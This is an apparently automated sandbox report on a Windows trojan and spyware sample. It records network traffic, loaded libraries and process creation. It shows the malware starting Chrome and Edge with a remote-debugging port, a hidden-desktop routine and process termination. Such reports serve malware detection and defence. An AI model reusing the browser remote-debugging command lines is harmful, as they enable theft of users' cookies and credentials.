                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50135
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50136
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50142
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50151
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50155 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50084 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50155
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50110 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50089 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50051
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50145 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50151 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50116 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50105
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50088 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50116
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50118
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50110
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50129
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50123
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50105 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50098
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50075 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50129 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50135 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50123 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50098 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50041 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50069 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
                  Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49704 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 94.130.188.57:443 -> 192.168.2.5:49705 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 94.130.188.57:443 -> 192.168.2.5:49762 version: TLS 1.2
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_00407060 FindFirstFileA,strlen,strlen,memcpy,OpenDesktopA,CreateDesktopA,lstrcpyA,lstrcpyA,strlen,Sleep,??3@YAXPAX@Z,??3@YAXPAX@Z,CreateProcessA,Sleep,strlen,Sleep,strlen,strlen,??3@YAXPAX@Z,CloseDesktop,_invalid_parameter_noinfo_noreturn,0_2_00407060

                  System Summary

                  barindex
                  PE file has a writeable .text section
                  Source: gVKsiQIHqe.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_004054A00_2_004054A0
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_0041C4500_2_0041C450
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_0041B0B00_2_0041B0B0
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_0041A3400_2_0041A340
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_0041DD600_2_0041DD60
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_0041CF700_2_0041CF70
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_0041D3F00_2_0041D3F0
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: String function: 00410340 appears 127 times
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: String function: 00404DF0 appears 77 times
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: String function: 004119B0 appears 43 times
                  Source: gVKsiQIHqe.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@63/316@26/17
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_00412050 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,Process32Next,OpenProcess,TerminateProcess,CloseHandle,0_2_00412050
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\KSK31933.htmJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Users\user\AppData\Local\Temp\e58e90fe-b7c4-4330-af47-4a24cd416b8b.tmpJump to behavior
                  Source: gVKsiQIHqe.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: WLN79ZCTR.0.dr, P8Q1VAS26.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: gVKsiQIHqe.exeReversingLabs: Detection: 71%
                  Source: gVKsiQIHqe.exeVirustotal: Detection: 66%
                  Source: unknownProcess created: C:\Users\user\Desktop\gVKsiQIHqe.exe "C:\Users\user\Desktop\gVKsiQIHqe.exe"
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2868 --field-trial-handle=2812,i,12872953387069903488,11110384550952122137,262144 /prefetch:8
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2576 --field-trial-handle=2224,i,4927073609183200829,12100842426449448139,262144 /prefetch:3
                  Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2244 --field-trial-handle=1996,i,16664765215465156230,11047928681594744707,262144 /prefetch:3
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6384 --field-trial-handle=1996,i,16664765215465156230,11047928681594744707,262144 /prefetch:8
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6444 --field-trial-handle=1996,i,16664765215465156230,11047928681594744707,262144 /prefetch:8
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6504 --field-trial-handle=1996,i,16664765215465156230,11047928681594744707,262144 /prefetch:8
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"Jump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"Jump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2868 --field-trial-handle=2812,i,12872953387069903488,11110384550952122137,262144 /prefetch:8Jump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2576 --field-trial-handle=2224,i,4927073609183200829,12100842426449448139,262144 /prefetch:3Jump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2244 --field-trial-handle=1996,i,16664765215465156230,11047928681594744707,262144 /prefetch:3
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6384 --field-trial-handle=1996,i,16664765215465156230,11047928681594744707,262144 /prefetch:8
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6444 --field-trial-handle=1996,i,16664765215465156230,11047928681594744707,262144 /prefetch:8
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6504 --field-trial-handle=1996,i,16664765215465156230,11047928681594744707,262144 /prefetch:8
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeSection loaded: rstrtmgr.dllJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                  Source: Google Drive.lnk.2.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                  Source: YouTube.lnk.2.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                  Source: Sheets.lnk.2.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                  Source: Gmail.lnk.2.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                  Source: Slides.lnk.2.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                  Source: Docs.lnk.2.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
